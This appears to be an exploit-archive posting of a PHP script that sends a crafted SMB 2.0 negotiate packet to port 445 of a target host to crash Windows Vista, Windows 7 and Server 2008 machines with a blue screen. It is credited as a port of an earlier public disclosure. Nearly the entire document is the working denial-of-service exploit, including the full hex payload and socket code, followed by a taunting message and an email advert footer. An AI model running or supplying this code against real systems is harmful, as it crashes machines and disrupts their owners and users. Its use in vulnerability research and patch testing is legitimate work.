Lame Windows Vista / 7 / 2k8 SMB 2.0 Blue Screen Of Death

`<?php  
/*  
* Lame Windows Vista / Windows 7 / Win2k8 R1 SP2+updates and beta R2 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote BSOD  
* Author: Ricardo Almeida  
* email: ricardojba[at]aeiou[DoT]pt  
*  
* Credits: http://seclists.org/fulldisclosure/2009/Sep/0039.html (exploit ported to PHP)  
*  
*/  
if ($argc != 2) {die("Usage: lame-smb-bsod.php <host>\n");}  
$host = $argv[1];  
$payload = "\x00\x00\x00\x90".  
"\xff\x53\x4d\x42".  
"\x72\x00\x00\x00".  
"\x00\x18\x53\xc8".  
"\x00\x26".  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe".  
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54".  
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31".  
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00".  
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57".  
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61".  
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c".  
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c".  
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e".  
"\x30\x30\x32\x00";  
$mysock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);  
$result = socket_connect($mysock, $host, 445);  
if ($result === false) echo "Connect failed.\nReason: ($result) " . socket_strerror(socket_last_error($mysock)) . "\n";  
else echo "\nConnected to $host\n";  
echo "Bye, Bye Windowz....\n";  
socket_write($mysock, $payload, strlen($payload));  
socket_close($mysock);  
---------------------------------------------------  
  
Venha conhecer o novo AEIOU: http://www.aeiou.pt  
`